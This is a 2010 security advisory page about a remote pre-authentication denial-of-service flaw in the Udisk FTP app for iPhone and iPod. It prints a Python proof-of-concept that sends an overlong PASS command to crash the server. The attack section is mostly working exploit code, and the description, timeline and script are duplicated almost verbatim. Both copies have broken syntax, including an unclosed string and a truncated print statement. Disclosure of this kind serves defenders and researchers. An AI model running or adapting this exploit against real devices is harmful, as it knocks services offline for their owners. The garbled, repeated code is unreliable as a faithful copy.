Security Advisory
- Apple Iphone & Ipod Udisk FTP basic edition Remote pre-auth DOS vulnerability Reported Date: 13-01-10
Exploit Code: http://triviasecurity.net/exploits/Apple-Iphone-Ipod-Udisk-FTP-basic-edition-Remote-pre-auth-DOS-vulnerability/1824
Rated Level: 
Impact: Dos,Remotely Exploitable
Affected Software: Apple Iphone and Ipod
Description: From the vendor website:
U.Disk is an easy used application, with stand FTP server build in. With this feature, you can upload or download thousands of files by on click. Just use Copy & Paste to access files. Like your real U-Disk.
002 : Vulnerability details
Remote Denial of Service:
When the application is sent a password (PASS) command with characters of size 2047 the application crashs. Remote code execution maybe possible.
003 : Vendor communication
[*] 3rd January, 2010 : Vendor contacted
[*] 9th January 2010 : Vendor reminded of vulnerability
[*] 12th January 2010 : Public Disclosure
004 : Exploit/PoC
#!/usr/bin/python
print "[+] Apple Iphone/Ipod Udisk FTP basic edition 0day Remote DOS exploit"
import socket
import sys
def Usage():
print ("Usage: ./udisk.py\n")
print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
username = "anonymous"
passwd = "x41? * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] Sending payload.."
sock.send("USER %s\r\n" %username)
sock.send("PASS %s\r\n" %passwd)
sock.send("PWD\r\n")
sock.close()
print "[+] Server is now DOS'ed ;)"
sys.exit(0);
U.Disk is an easy used application, with stand FTP server build in. With this feature, you can upload or download thousands of files by on click. Just use Copy & Paste to access files. Like your real U-Disk.
002 : Vulnerability details
Remote Denial of Service:
When the application is sent a password (PASS) command with characters of size 2047 the application crashs. Remote code execution maybe possible.
003 : Vendor communication
[*] 3rd January, 2010 : Vendor contacted
[*] 9th January 2010 : Vendor reminded of vulnerability
[*] 12th January 2010 : Public Disclosure
004 : Exploit/PoC
#!/usr/bin/python
print "[+] Apple Iphone/Ipod Udisk FTP basic edition 0day Remote DOS exploit"
import socket
import sys
def Usage():
print ("Usage: ./udisk.py
print ("Example:./udisk.py 192.168.2.3\n")
if len(sys.argv) <> 2:
Usage()
sys.exit(1)
else:
hostname = sys.argv[1]
username = "anonymous"
passwd = "x41? * 2047
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 8080))
print "[+] Connecting to the target.."
except:
print ("[-] Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] Sending payload.."
sock.send("USER %s\r\n" %username)
sock.send("PASS %s\r\n" %passwd)
sock.send("PWD\r\n")
sock.close()
print "[+] Server is now DOS'ed ;)"
sys.exit(0);
Note: mr_me
Solution:
No Solution Till Date
Original Advisory: http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-003-udisk-v1-0-remote-dos/
Feedback: If you have additional information or corrections for this security advisory please contact us at advisory(at)triviasecurity.org
- Ubuntu 9.10 PAM MOTD file tampering (privilege escalation) (11/07/10)
- Pligg CMS v1.0.4 Installation File XSS Vulnerability (11/07/10)
- Cpanel 11.25 - [CSRF] Add FTP Account (05/07/10)
- Sun Java Web Server version 7.0 update 7 remote stack overflow exploit (05/07/10)
- Ziggurat Farsi CMS SQL Injection Vulnerability (05/07/10)
- SasCam WebCam Server version 2.6.5 active-x SEH overwrite exploit (05/07/10)
- ISC DHCPd DOS proof of concept exploit (05/07/10)
- Multiple Cisco CSS / ACE Client Certificate and HTTP Header Manipulation Vulnerabilities (05/07/10)
- Joomla (com_seyret) - LFI Vulnerability (05/07/10)
- Joomla Eventcal component v1.6.4 Remote blind SQL injection vulnerability (05/07/10)
- Copyright © 2003-2010 TriviaSecurity Team